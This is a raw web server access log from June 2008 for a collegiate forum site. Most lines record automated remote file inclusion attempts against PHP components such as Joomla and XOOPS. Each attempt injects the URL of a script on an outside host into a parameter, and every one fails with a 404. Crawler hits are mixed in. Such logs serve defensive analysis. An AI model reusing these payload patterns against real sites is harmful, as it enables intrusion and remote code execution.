65.55.213.10 - - [01/Jun/2008:17:44:41 -0700] "GET /Jonathan_Fantini_Porter/germany.php HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
65.55.213.10 - - [01/Jun/2008:17:44:41 -0700] "GET /Jonathan_Fantini_Porter/contact.php HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
65.55.213.10 - - [01/Jun/2008:17:44:41 -0700] "GET /Jonathan_Fantini_Porter/canada.php HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
65.55.213.10 - - [01/Jun/2008:17:44:41 -0700] "GET /Jonathan_Fantini_Porter/copyright.php HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
65.55.213.10 - - [01/Jun/2008:17:44:41 -0700] "GET /Jonathan_Fantini_Porter/collegiateforumfund.php HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
65.55.213.10 - - [01/Jun/2008:17:44:41 -0700] "GET /staff/collegiateforum HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
62.140.19.142 - - [01/Jun/2008:17:45:40 -0700] "GET /logs/access_080107.log//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
62.140.19.142 - - [01/Jun/2008:17:45:40 -0700] "GET //config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
62.140.19.142 - - [01/Jun/2008:17:45:41 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
70.87.13.42 - - [01/Jun/2008:17:45:46 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.87.13.42 - - [01/Jun/2008:17:45:46 -0700] "GET //config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
83.65.47.4 - - [01/Jun/2008:17:46:35 -0700] "GET /logs/access_080324.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
83.65.47.4 - - [01/Jun/2008:17:46:35 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
83.65.47.4 - - [01/Jun/2008:17:46:35 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
82.146.59.231 - - [01/Jun/2008:17:46:58 -0700] "GET //admin/index.php?o=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
193.192.58.2 - - [01/Jun/2008:17:47:06 -0700] "GET /logs/access_080107.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
70.168.36.247 - - [01/Jun/2008:17:47:42 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.collegiateforum.org"
85.234.133.173 - - [01/Jun/2008:17:47:45 -0700] "GET /logs/passwd.php?env[include_prefix]=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
85.234.133.173 - - [01/Jun/2008:17:47:45 -0700] "GET /passwd.php?env[include_prefix]=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
66.249.65.211 - - [01/Jun/2008:17:48:27 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.collegiateforum.org"
66.249.65.211 - - [01/Jun/2008:17:48:27 -0700] "GET /logs/ HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.collegiateforum.org"
200.87.179.130 - - [01/Jun/2008:17:48:56 -0700] "GET //skin/zero_vote/error.php?dir=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.87.179.130 - - [01/Jun/2008:17:48:56 -0700] "GET //skin/zero_vote/error.php?dir=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.87.179.130 - - [01/Jun/2008:17:48:59 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.87.179.130 - - [01/Jun/2008:17:49:00 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
216.67.238.88 - - [01/Jun/2008:17:49:28 -0700] "GET /passwd.php?env[include_prefix]=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.collegiateforum.org"
216.67.238.88 - - [01/Jun/2008:17:49:28 -0700] "GET /logs/passwd.php?env[include_prefix]=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:17:49:47 -0700] "GET /logs/access_080204.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:17:49:48 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:17:49:48 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:17:49:51 -0700] "GET /logs/access_080204.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:17:49:51 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:17:49:51 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
88.191.63.70 - - [01/Jun/2008:17:50:36 -0700] "GET /passwd.php?env[include_prefix]=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.collegiateforum.org"
88.191.63.70 - - [01/Jun/2008:17:50:36 -0700] "GET /logs/passwd.php?env[include_prefix]=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:50:44 -0700] "GET /logs/access_080128.log//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:50:44 -0700] "GET /logs/access_080128.log//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
208.116.44.60 - - [01/Jun/2008:17:50:56 -0700] "GET /logs/access_080204.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
208.116.44.60 - - [01/Jun/2008:17:50:56 -0700] "GET /logs/access_080204.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
208.116.44.60 - - [01/Jun/2008:17:50:56 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
208.116.44.60 - - [01/Jun/2008:17:50:56 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
208.116.44.60 - - [01/Jun/2008:17:50:56 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
208.116.44.60 - - [01/Jun/2008:17:50:56 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:17:51:04 -0700] "GET /logs/access_080204.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:17:51:05 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:17:51:05 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:17:51:08 -0700] "GET /logs/access_080204.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:17:51:08 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:17:51:08 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
70.87.13.42 - - [01/Jun/2008:17:51:11 -0700] "GET /logs/access_080128.log//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
61.58.40.55 - - [01/Jun/2008:17:51:41 -0700] "GET /passwd.php?env[include_prefix]=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.collegiateforum.org"
61.58.40.55 - - [01/Jun/2008:17:51:42 -0700] "GET /logs/passwd.php?env[include_prefix]=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.collegiateforum.org"
62.140.19.142 - - [01/Jun/2008:17:52:07 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
62.140.19.142 - - [01/Jun/2008:17:52:08 -0700] "GET //config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:52:26 -0700] "GET /logs/access_080107.log//config/dbutil.bck.php?confdir=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:52:26 -0700] "GET //config/dbutil.bck.php?confdir=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:52:26 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
212.193.226.112 - - [01/Jun/2008:17:53:08 -0700] "GET /logs/access_080121.log//tools/send_reminders.php?noSet=0&includedir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
86.155.67.172 - - [01/Jun/2008:17:53:32 -0700] "GET /newsletter.php?waroot=http://www.ilegais.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:53:41 -0700] "GET /logs/access_080204.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:53:41 -0700] "GET /logs/access_080204.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:53:42 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:53:42 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:53:42 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:53:43 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.91.166 - - [01/Jun/2008:17:53:48 -0700] "GET //config/dbutil.bck.php?confdir=http://singspiration.org/id.txt.1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
69.27.110.65 - - [01/Jun/2008:17:53:52 -0700] "GET /logs/access_080128.log//config/dbutil.bck.php?confdir=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
72.30.179.229 - - [01/Jun/2008:17:54:09 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
89.108.91.166 - - [01/Jun/2008:17:54:12 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt.1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.108.91.166 - - [01/Jun/2008:17:54:12 -0700] "GET //config/dbutil.bck.php?confdir=http://singspiration.org/id.txt.1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
67.195.51.111 - - [01/Jun/2008:17:54:27 -0700] "GET /Jonathan_Fantini_Porter/canada.php HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:55:13 -0700] "GET //config/dbutil.bck.php?confdir=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
82.146.59.231 - - [01/Jun/2008:17:56:27 -0700] "GET /logs/access_080107.log//admin/index.php?o=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
82.146.59.231 - - [01/Jun/2008:17:56:28 -0700] "GET /logs//admin/index.php?o=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
62.140.19.142 - - [01/Jun/2008:17:57:41 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
74.200.201.194 - - [01/Jun/2008:17:57:45 -0700] "GET /logs/access_080324.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
74.200.201.194 - - [01/Jun/2008:17:57:45 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
74.200.201.194 - - [01/Jun/2008:17:57:45 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:58:54 -0700] "GET /logs/access_080324.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:58:54 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:58:54 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:58:58 -0700] "GET /logs/access_080324.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:58:59 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:58:59 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.87.13.42 - - [01/Jun/2008:17:59:15 -0700] "GET /logs/access_080324.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.87.13.42 - - [01/Jun/2008:17:59:15 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.87.13.42 - - [01/Jun/2008:17:59:15 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:59:17 -0700] "GET /logs/access_080128.log//config/dbutil.bck.php?confdir=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
194.158.195.132 - - [01/Jun/2008:17:59:17 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.collegiateforum.org"
194.158.195.132 - - [01/Jun/2008:17:59:17 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.collegiateforum.org"
190.54.28.163 - - [01/Jun/2008:18:00:09 -0700] "GET /logs/access_080107.log/componentscom_forumdownload.php?phpbb_root_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
80.154.38.121 - - [01/Jun/2008:18:00:16 -0700] "GET //config/dbutil.bck.php?confdir=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
190.54.28.163 - - [01/Jun/2008:18:00:17 -0700] "GET /logs/componentscom_forumdownload.php?phpbb_root_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.6.18.243 - - [01/Jun/2008:18:00:56 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "collegiateforum.org"
74.6.18.243 - - [01/Jun/2008:18:00:56 -0700] "GET /logs/access.log HTTP/1.0" 200 70224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:01:10 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:01:20 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
206.123.114.66 - - [01/Jun/2008:18:01:20 -0700] "GET /logs/access.log/index.php?go=http://amazu.de/.d/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
206.123.114.66 - - [01/Jun/2008:18:01:21 -0700] "GET /index.php?go=http://amazu.de/.d/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
206.123.114.66 - - [01/Jun/2008:18:01:21 -0700] "GET /logs/index.php?go=http://amazu.de/.d/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
206.123.114.66 - - [01/Jun/2008:18:01:23 -0700] "GET /logs/access_080107.log/index.php?go=http://amazu.de/.d/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:01:30 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
72.30.214.232 - - [01/Jun/2008:18:01:33 -0700] "GET /logs/access_080324.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
219.94.133.251 - - [01/Jun/2008:18:01:36 -0700] "GET /logs/access_080204.log/index.php?go=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
219.94.133.251 - - [01/Jun/2008:18:01:36 -0700] "GET /logs/index.php?go=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
193.252.3.200 - - [01/Jun/2008:18:02:04 -0700] "GET //nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:03:11 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:03:14 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:03:17 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:03:56 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:04:02 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:04:10 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
80.67.24.32 - - [01/Jun/2008:18:04:27 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.collegiateforum.org"
80.67.24.32 - - [01/Jun/2008:18:04:27 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.collegiateforum.org"
193.192.58.2 - - [01/Jun/2008:18:04:43 -0700] "GET /logs/access_080324.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.192.58.2 - - [01/Jun/2008:18:04:43 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.192.58.2 - - [01/Jun/2008:18:04:43 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
